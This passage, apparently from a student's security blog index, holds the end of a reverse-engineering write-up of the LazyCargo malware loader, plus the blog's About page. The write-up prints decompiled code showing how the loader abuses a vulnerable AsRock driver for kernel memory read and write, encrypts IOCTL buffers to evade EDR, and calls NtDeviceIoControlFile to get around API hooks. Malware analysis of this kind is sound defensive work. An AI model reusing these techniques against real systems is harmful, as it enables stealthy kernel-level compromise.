It then finds the physical RAM address of a target IOCTL handler and uses a custom wrapper function (FUN_Driver - function) to send an IOCTL code (0x22e80c) to the vulnerable AsRock driver.\n1 2 3 4 5 6 7 8 9 10 11 12 13 // Assembles the payload: Shellcode header + Unsigned Driver memcpy(puStack_568, (undefined8 *)\u0026amp;DAT_140061b70, 0x7fb); memcpy((undefined8 *)((longlong)puStack_568 + 0x7fb), UnsignedDriver_Data, ...); // Locates target memory phyisical-address = find-physical-ram-addr(); // Exploits the AsRock driver to write to kernel memory local_548[0] = phyisical-address; FUN_Driver-function(0x22e80c, (undefined4 *)local_548); // Triggers the execution of the injected shellcode (*DAT_14006c740)(hDevice_AsRock, 0, 0, 0); Takeaway: The loader leverages a specific vulnerability (triggered via IOCTL 0x22e80c) in the AsRock driver to achieve arbitrary kernel memory write capabilities. It uses this to overwrite memory and manually map/execute the malicious, unsigned driver—completely bypassing Windows OS protections.\nExploit Specifics With a deeper look at the underlying functions, the true mechanics of how LazyCargo weaponizes the AsRock driver become clear. It executes a highly precise sequence involving physical memory scanning, payload encryption, and low-level system calls to achieve Ring 0 execution.\n1. Hunting for the Target in Physical RAM Before the malware can inject its payload, it needs to know exactly where to write it. The find - physical - ram - addr function handles this by using the vulnerable driver as a memory scanner.\n1 2 3 4 5 6 7 8 9 // Scans memory using a read IOCTL (0x22e808) Debug-check = FUN_Driver-function(0x22e808, (undefined4 *)\u0026amp;local_50); // Compares the read memory against a hardcoded signature if ((Debug-check == 0) \u0026amp;\u0026amp; (Debug-check = memcmp(pvStack_90, \u0026amp;DAT_140062370, 0xa0), Debug-check == 0)) { GetTickCount(); printf(\u0026#34;\\nfound map in %.3f sec physical address : %016I64x\\n\u0026#34;); goto FUN_no-debug-found; } Takeaway: The malware uses IOCTL 0x22e808 (which grants arbitrary physical memory read access) to iterate through RAM. It reads chunks of memory and uses memcmp to compare them against a specific 160-byte (0xa0 hex) signature. This allows the malware to dynamically locate the exact physical address of the target kernel structure or function it intends to overwrite, bypassing memory randomization protections like ASLR.\n2. Evading Detection with Encrypted Payloads When dispatching IOCTLs to the driver, LazyCargo doesn\u0026rsquo;t send its data in the clear. The FUN_Driver - function acts as a specialized wrapper that utilizes the BCrypt API (Windows Cryptography Next Generation) to encrypt the payload parameters.\n1 2 3 4 5 6 7 8 9 // Initializes AES encryption via Windows CNG NVar5 = BCryptOpenAlgorithmProvider(\u0026amp;local_b8, L\u0026#34;AES\u0026#34;, (LPCWSTR)0x0, 0); // ... (Key generation and buffer setup) ... // Encrypts the IOCTL parameters/payload before sending NVar5 = BCryptEncrypt(local_b0, pUStack_78, cbOutput-local_a8[0], (void *)0x0, (PUCHAR)0x0, 0, pUStack_78, cbOutput, local_c0, 1); Takeaway: By utilizing AES to encrypt the IOCTL buffer, the malware achieves two critical objectives: it satisfies the specific cryptographic input requirements of this version of the AsRock driver, and it actively evades Endpoint Detection and Response (EDR) solutions that scan memory buffers for known plaintext shellcode patterns before they enter kernel space.\n3. 
Bypassing User-Mode Hooks (The Trigger) To actually send the IOCTLs and trigger the execution, the malware actively avoids using the standard DeviceIoControl function found in kernel32.dll. Instead, it resolves the underlying NTAPI function directly.\n1 2 3 4 5 6 // Dynamically resolves the lowest-level user-mode API hModule = GetModuleHandleA(\u0026#34;ntdll.dll\u0026#34;); DAT_14006c740 = GetProcAddress(hModule, \u0026#34;NtDeviceIoControlFile\u0026#34;); // Later, the function pointer is used to send the IOCTL directly: (*DAT_14006c740)(hDevice_AsRock, 0, 0, 0); Takeaway: This is a classic user-mode hook evasion technique. Many security products monitor the higher-level DeviceIoControl API to catch malicious driver interactions. By dynamically resolving and calling NtDeviceIoControlFile straight from ntdll.dll, LazyCargo slips under those API hooks, ensuring its commands are handed directly to the kernel to trigger the final Ring 0 payload execution.\nSummary From our static analysis, LazyCargo paints a clear picture: it is a purpose-built, highly evasive BYOVD loader. By dropping the vulnerable AsRock driver, scanning physical memory for its exact injection point, encrypting its IOCTL communications to blind EDRs, and bypassing standard API hooks via NtDeviceIoControlFile, it methodically paves a stealthy path straight to Ring 0.\nBut static analysis only gives us the blueprint; dynamic analysis is where we prove it works. Detonating this malware wasn\u0026rsquo;t as simple as firing up a VM and watching it run. To truly verify my findings, I had to tackle the execution in three distinct phases. First, I needed to navigate the gauntlet of anti-debugging traps built into the binary just to get it to execute freely in my environment. Second, because LazyCargo acts as a reflective loader, I had to write and compile a bare-bones dummy driver to ensure the malware could actually load it into memory without immediately blue-screening the Windows kernel. Finally, once I achieved a stable load, I moved on to developing a more complex custom payload attempting the classic calc.exe pop to definitively prove that the injected code successfully executes with full kernel-level privileges.\nDynamic Analysis Debugger Traps While analyzing LazyCargo, I quickly realized that throwing this binary directly into a debugger wasn\u0026rsquo;t going to be completely straightforward. The developers left behind side-effects of their build configuration and included time profiling that can make debugging quite annoying. I\u0026rsquo;ve broken down the two main tricks I found that hinder the analysis process.\n1. Time Profiling A technique flagged during my capa scan was the use of GetTickCount. I tracked this down to the FUN_ai_find_physical_ram_addr function, which is responsible for scanning memory.\n1 2 3 4 5 6 7 if (local_58 == \u0026#39;\\0\u0026#39;) { GetTickCount(); if ((Debug_check == 0) \u0026amp;\u0026amp; (Debug_check = memcmp(pvStack_90,\u0026amp;DAT_140062370,0xa0), Debug_check == 0)) { GetTickCount(); printf(\u0026#34;\\nfound map in %.3f sec physical address : %016I64x\\n\u0026#34;); goto FUN_no_debug_found; } The malware records the system uptime immediately before and after its physical memory scan loop. While the primary purpose here appears to be calculating the elapsed time to print to the console, time delta checks like this are notoriously used to detect debuggers. 
If an analyst is manually stepping through this loop in a debugger, the time delta between the two GetTickCount() calls will be massive compared to a normal execution. This can inadvertently trigger anti-debugging behaviors if checked later, or simply alert the analyst that time is being monitored.\n2. Debug Build Artifacts \u0026amp; INT 3 Traps Interestingly, this malware sample was compiled as a Debug build. Because of this, it includes Microsoft Visual C++ runtime assertions (specifically _CrtDbgReport for std::vector out-of-bounds checks).\n1 2 3 4 5 6 7 Debug_check = _CrtDbgReport(2, \u0026#34;c:\\\\program files (x86)\\\\microsoft visual studio\\\\2017\\\\enterprise\\\\vc\\\\tools\\\\msvc\\\\14.16.27023\\\\include\\\\vector\u0026#34;,0x6c5,(char *)0x0,\u0026#34;%s\u0026#34;); if (Debug_check == 1) { var_int3_trigger = (code *)swi(3); (*var_int3_trigger)(); return; } If you are debugging the malware and trigger one of these bounds checks, the CRT will pop an assertion dialog. If you click \u0026ldquo;Retry\u0026rdquo; (which returns 1), the malware executes a software interrupt (swi(3)), which translates to an INT 3 instruction. This acts as a hardcoded breakpoint. If you aren\u0026rsquo;t expecting it or your debugger doesn\u0026rsquo;t handle the exception properly, it breaks the execution flow entirely and makes dynamic analysis incredibly frustrating.\nAnother thing you have to get around is that the binary expects a payload. While you can skip over many of these checks, it becomes increasingly hard when LazyCargo tries to load the payload and doesn\u0026rsquo;t find anything. This means that to get the malware to run to completion I would need to give LazyCargo a payload that would not crash the system when loaded into the kernel.\nDummy Driver The dummy driver was the first attempt at this, as I was not sure what was going to be needed. I started out trying to compile a binary that had the right metadata and structure and wasted a whole bunch of time trying to manually create what Windows already had. The Windows Driver Kit (WDK) is a tool that basically does all of that for you. So I installed the WDK and built the first piece of code that, when passed in as a payload, did not crash my system.\n1 2 3 4 5 6 7 8 9 10 11 #include \u0026lt;ntddk.h\u0026gt; void DriverUnload(PDRIVER_OBJECT DriverObject) { DbgPrint(\u0026#34;LazyCargo Analysis: Driver Unloaded Successfully!\\n\u0026#34;); } NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { DbgPrint(\u0026#34;LazyCargo Analysis: Hello World! The payload executed successfully.\\n\u0026#34;); DriverObject-\u0026gt;DriverUnload = DriverUnload; return STATUS_SUCCESS; } This was not the first attempt, but it was the first payload I was able to pass in without it crashing the system. The Windows Driver Kit provides the build instructions, so all the file formatting is done automatically, along with the functions that get called once the driver is inside the operating system. The DriverEntry function gets called when the driver is first loaded; passed into it are the driver object and a registry path. Then there is the DriverUnload function, which is meant to remove the driver once it is loaded, so that I could run this multiple times without having to worry about overlap beyond the BYOVD driver overlap.\nNow, due to the way the driver is loaded, I can\u0026rsquo;t see the DbgPrint() output, so while the computer was no longer crashing, there was no way to know if LazyCargo actually worked in the VM.
So I continued building more complicated drivers to have definitive proof that it worked.\nCustom Payload I chose to try to get calc.exe to show up on the screen after running LazyCargo, as this is a very common proof of concept in exploit work. It turns out that this is a very complex multi-stage process to accomplish from ring 0.\nI knew the file I passed in would need to have the proper structure, since LazyCargo acts as a reflective loader for the payload. Some shell code facilitates this, so I took a closer look at what it was expecting.\nThe shell code was expecting a standard PE binary file. This meant that I just had to create a standard PE binary file.\n1 2 3 4 // Code examples here for (int i = 0; i \u0026lt; 10; i++) { printf(\u0026#34;%d, \u0026#34;, i); } Summary Not done at the moment.\n","permalink":"https://blog.lukasmay.com/projects/lazycargo/","summary":"\u003ch2 id=\"introduction\"\u003eIntroduction\u003c/h2\u003e\n\u003cp\u003eThis is meant to be an outline of what I found while reversing the \u003cstrong\u003eLazyCargo\u003c/strong\u003e malware sample. This malware sample is one part of the five pipedream/INCONTROLLER malware framework components discovered by several cybersecurity firms and government agencies. The LazyCargo malware is a Windows dropper for another module in the framework. I don\u0026rsquo;t have access to any of the other components, so I wrote a payload to run the LazyCargo malware at the end of the analysis to verify my findings from the static analysis.\u003c/p\u003e","title":"LazyCargo"},{"content":"About Lukas May Welcome to my cybersecurity blog! I\u0026rsquo;m a Junior at the Rochester Institute of Technology (RIT) studying cybersecurity who loves diving deep into interesting technical problems and sharing what I learn along the way.\nA big part of my focus is OT security\u0026ndash;how we defend critical infrastructure like the electric grid, water treatment plants, or manufacturing systems. Through this site I aim to share my research and analysis of the cybersecurity and tech world.\nWhat You\u0026rsquo;ll Find Here This site serves two main purposes:\nDeep Dives: In-depth explorations of technical topics, research, and interesting technologies I\u0026rsquo;m learning about. Projects: Documentation of things I\u0026rsquo;ve built, including technical implementations and weekend experiments. Get In Touch The best way to reach me is through LinkedIn\nThanks for stopping by! Whether you\u0026rsquo;re here for the casual weekend project stories or the more formal technical documentation, I hope you find something useful or interesting.\n","permalink":"https://blog.lukasmay.com/about/","summary":"\u003ch1 id=\"about-lukas-may\"\u003eAbout Lukas May\u003c/h1\u003e\n\u003cp\u003eWelcome to my cybersecurity blog! I\u0026rsquo;m a Junior at the Rochester Institute of Technology (RIT) studying cybersecurity who loves diving deep into interesting technical problems and sharing what I learn along the way.\u003c/p\u003e\n\u003cp\u003eA big part of my focus is OT security\u0026ndash;how we defend critical infrastructure like the electric grid, water treatment plants, or manufacturing systems. Through this site I aim to share my research and analysis of the cybersecurity and tech world.\u003c/p\u003e","title":"About"}]